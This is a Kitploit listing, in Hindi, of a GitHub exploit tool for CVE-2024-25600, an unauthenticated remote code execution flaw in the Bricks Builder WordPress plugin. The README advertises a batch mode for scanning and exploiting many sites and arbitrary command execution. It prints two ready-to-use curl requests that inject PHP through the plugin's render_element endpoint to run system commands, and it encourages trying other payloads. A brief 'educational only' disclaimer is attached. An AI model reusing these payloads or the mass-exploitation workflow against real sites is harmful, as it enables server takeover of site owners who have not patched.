Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress | Kitploit
उपकरण/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-25600 एक्सप्लॉइट टूल 🚀

विवरण 📝

यह टूल 🛠️ वर्डप्रेस के Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता 🕳️ का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों 💻 पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देती है। यह टूल nonce प्राप्त करके और मनमाने कमांड निष्पादित करने के लिए विशेष रूप से निर्मित अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।

विशेषताएँ 🌟

  • इंटरैक्टिव मोड: लक्ष्य वेबसाइट के साथ वास्तविक समय में जुड़ें 🕹️।
  • बैच मोड: सूची से कई वेबसाइटों को स्कैन और शोषण करें 📋।
  • कमांड निष्पादन: लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करें ⚙️।

स्थापना 🛠️

  1. git clone का उपयोग करके इस रिपॉज़िटरी को अपनी स्थानीय मशीन 🖥️ पर क्लोन करें।
  2. क्लोन की गई रिपॉज़िटरी की निर्देशिका पर जाएँ।
  3. pip install -r requirements.txt का उपयोग करके आवश्यक Python लाइब्रेरी स्थापित करें।

उपयोग 📖

इंटरैक्टिव मोड 🎮

  1. इंटरैक्टिव मोड शुरू करने के लिए python exploit.py -u <URL> के साथ टूल चलाएँ।
  2. लक्ष्य सर्वर पर कमांड भेजने के लिए ऑन-स्क्रीन संकेतों का पालन करें।

बैच मोड 📊

  1. लक्ष्य URL की सूची के साथ एक टेक्स्ट फ़ाइल तैयार करें।
  2. सूचीबद्ध साइटों को स्कैन और शोषण करने के लिए python exploit.py -l <file_path> के साथ टूल चलाएँ।

प्रूफ ऑफ कॉन्सेप्ट (PoC) 📝

प्रकटीकरण द्वारा प्रदान किया गया मूल PoC इस प्रकार है:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

अपडेट: दूसरा PoC (अधिक विश्वसनीय)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

यह संभव है कि अतिरिक्त पेलोड बेहतर परिणाम दे सकते हैं। यदि मेरा एक्सप्लॉइट या प्रूफ ऑफ कॉन्सेप्ट आपके लिए काम नहीं करता है, तो मैं आपको अधिक प्रभावी समाधान खोजने के लिए वैकल्पिक पेलोड के साथ प्रयोग करने के लिए प्रोत्साहित करता हूँ।

[HOST] को लक्ष्य वेबसाइट से और [NONCE] को साइट से प्राप्त nonce मान से बदलें।

संदर्भ 📖

CVE-2024-25600 भेद्यता के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।

अस्वीकरण ⚠️

इस README में दी गई जानकारी केवल शैक्षिक उद्देश्यों के लिए है। अनधिकृत रूप से वेबसाइटों या नेटवर्कों में हैकिंग करना अवैध और अनैतिक है। 🚫

आभार 🙏

इस भेद्यता को खोजने और रिपोर्ट करने वाले सुरक्षा शोधकर्ताओं को धन्यवाद, जिन्होंने समुदाय को उनके वेब अनुप्रयोगों को सुरक्षित करने में मदद करने के लिए जानकारी और उपकरण प्रदान किए।

टूल डाउनलोड करें